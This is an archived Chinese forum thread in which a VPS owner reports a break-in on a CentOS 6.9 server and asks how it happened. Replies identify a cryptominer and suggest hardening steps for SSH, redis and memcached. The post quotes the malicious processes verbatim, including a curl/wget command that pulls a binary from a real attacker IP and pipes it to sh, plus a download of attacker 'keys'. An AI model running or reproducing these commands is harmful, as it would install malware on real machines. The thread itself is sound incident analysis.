云主机被扫入侵，大家帮分析怎么解决？

vps网友提供 12-18 讨论归档 13

云主机被哪位大佬入侵了，清空了我的 crontab。并未破坏我的其他主要文件。多了三个进程

1  curl -s https://blockchain.info/balance?cors=true&active=
2  /bin/sh -c (curl -s http://185.164.72.119/log_rotate.bin||wget -q -O- http://185.164.72.119/log_rotate.bin)|sh
3  curl -o /tmp/keys http://178.32.46.58/keys

执行的脚本如下： https://ideone.com/4OR7Xr

我的主机系统版本：

# lsb_release -a
LSB Version:    unavailable
Distributor ID: CentOS
Description:    CentOS release 6.9 (Final)
Release:        6.9
Codename:       Final
# uname -a
Linux vt1 2.6.32-696.20.1.el6.x86_64 #1 SMP Fri Jan 26 17:51:45 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

计算机密码随机大小写字母+数字+特殊符号。 V2 大佬们帮分析，是用了哪个漏洞入侵的？

本文由 vps网友提供，转载请注明出处

本文链接： https://www.vpsvsvps.com/discuss/a/1676472008180764672.html

标签:

12-18

我把 openssh 升级到最新版。把 memcached 指定到 127.0.0.1。顺便更新了一下系统。看看明天还会不会被入侵。

12-18

你可能是 web 漏洞然后被提权了而已。

12-18

@zzugyl 我指的是 web redis 等等这种 bind 0.0.0.0 暴露的，或者通过接口能够访问到的
因为直写 crontab 说明已经 root 了

12-18

@nicevar #7 正好开放了 22 端口，在内网情况下。root 登录开放了。

12-18

先说说开了哪些服务，这是其一
其二是很多小的 vps 提供商可能被默认值入或者被 hacking 值入模版...

12-18

另外这可能都不是人为直接操作入侵的，大佬没必要盯着一台小服务器浪费时间，估计就是自动入侵程序随机扫描搞定了

12-18

一般就那几点时，ssh 默认 22 端口还允许 root 登陆、redis/MySQL 之类暴露公网了、站点有漏洞让拿到 webshell

12-18

这就是挖矿的脚本，memcached 看看是不是空口令弱口令~杀掉进程，删除 blockchain 下载的挖矿脚本，改下密码就行~

12-18

@zzugyl 我们微信沟通？

12-18

@lovelynn #3 没有跑 redis，有 memcached 和 nginx。

12-17

你有没有开 redis 一般 crontab 修改的都是 redis 未授权访问

12-17

@asd940808 #1 现在问题不严重。我想研究一下，他是怎么入侵的。感觉对方利用漏洞执行的。

12-17

改端口，禁 root 和密码登录。用密钥登录，应该就能避免绝大部分的入侵了吧？